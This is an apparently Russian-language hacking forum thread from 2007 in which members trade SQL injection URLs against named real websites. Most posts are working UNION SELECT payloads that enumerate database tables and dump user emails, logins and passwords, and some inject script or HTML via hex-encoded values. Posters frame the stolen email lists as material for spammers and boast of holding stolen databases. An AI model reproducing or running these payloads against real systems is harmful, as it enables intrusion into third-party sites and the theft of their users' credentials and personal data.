SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.togather.biz/showcg.php?id=-4+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),5,6,7,8,9,10,11/*
     
    1 person likes this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    когда будете пробиваться дальше, не убирайте переменные после начала комментария, на сайте видимо стоит какой то скрипт, который проверяет правильность строки, если убрать не нужные переменные - выкидывает на индекс =\
     
  3. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Спамерам база мыл
    Code:
    http://www.timegifts.ru/index.php?description=-1'+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(email_user,0x3a,password),0x75),0x75)+from+us
     
    1 person likes this.
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Скобку после -99 тоже не убираем =)
     
    1 person likes this.
  5. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13,14,15/*
    http://www.democracy.ru/print.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+242,1/*
    
    http://www.democracy.ru/print.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+25,1/*
    http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(table_schema,char(58),column_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=char(99,108,105,101,110,116,115)+limit+0,1/*
    http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(clientID,char(58),clientname,char(58),contact,char(58),email,char(58),views,char(58),clicks,char(58),clientusername,char(58),clientpassword,char(58),expire),4,5,6,7,8,9,10,11,12,13,14,15+from+iesd.clients+limit+0,1/*
    
    http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(username,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15+from+iesd.phpbb_users+limit+1,1/*
     
    3 people like this.
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =))))
     
    1 person likes this.
  7. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    [offtop] я это выкладывал страниц 20 назад [/offtop]
     
  8. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    0_о
    ***** >www.timegifts.ru Не хо покопаться,там говорят скуль есть
    bxN5 > Могу ,а нах*й тебе?
    *****> Там говорят база мыл хорошая
    Не видел,мне вообще эта ветка не нравится
     
  9. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    было, было) у меня база на харде)

    ps: piro.ru шоп
    Code:
    http://www.piro.ru/show_katalog.php?id=-1+union+select+1,2,concat(login,0x3a,password)+from+users/*
    мб было, не помню..
    база логины:пассы в откр. виде
     
    1 person likes this.
  10. edos

    edos Member

    Joined:
    29 Aug 2005
    Messages:
    115
    Likes Received:
    26
    Reputations:
    9
    не могу ниче подобрать
     
    1 person likes this.
  11. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    2edos
    аффигительная скуля))
    там и подбирать ничего неандо))
     
    #1811 VampiRUS, 10 Apr 2007
    Last edited: 10 Apr 2007
    5 people like this.
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    может байан
    ЗЫ Превед Ксандер =)

    VampiRUS, скуля жесть, include() рулит =)
     
  13. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    http://www.jerusalemsummit.org/eng/news.php?news=-102+union+select+1,2,3,User(),4,5,version(),7,9,database()/*
     
    #1813 _GaLs_, 10 Apr 2007
    Last edited: 10 Apr 2007
    2 people like this.
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    SQL - Injection
     
    1 person likes this.
  15. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.4cio.ru/main.php?mname=160&number=-1+union+select+0x3c7363726970743e616c6572742827444956455227293c2f7363726970743e+from+mysql.user+limit+0,1/*
     
    #1815 *D1VER, 10 Apr 2007
    Last edited: 10 Apr 2007
    3 people like this.
  16. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    Code:
    http://www.maptun.com/webshop/shop.php?rubrik=25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5,56,57,58,59,60,61,62--
    
    
    http://www.maptun.com/news.php?id=-104+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
    
    
    http://www.maptun.com/cars.php?id=-57+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,version(),19,database(),TABLE_NAME,22,23,24,25,26,27,28,29,30+from+INFORMATION_SCHEMA.TABLES+limit+32,1-
    
    Code:
    http://www.afcwimbledon.co.uk/shop/shop.php?deptid=1+and+1--  
    http://www.afcwimbledon.co.uk/shop/shop.php?subid=2&itemid=951+and+version()%3C4
     
    6 people like this.
  17. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
    update
     
    #1817 Spyder, 10 Apr 2007
    Last edited: 10 Apr 2007
    2 people like this.
  18. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.ibercork.ru/news.php?id=-1+union+select+1,0x3c68313ed8ebffefe020eae0eae0fff2ee20283c2f68313e,111/*
     
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    @_@
    update
     
    #1819 Spyder, 10 Apr 2007
    Last edited: 10 Apr 2007
    2 people like this.
  20. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    http://www.promtractor.ru/products_show.php?section=9&id=75+union+select+1,2,3,4,5,6,7,8,9,0/*
     
Thread Status:
Not open for further replies.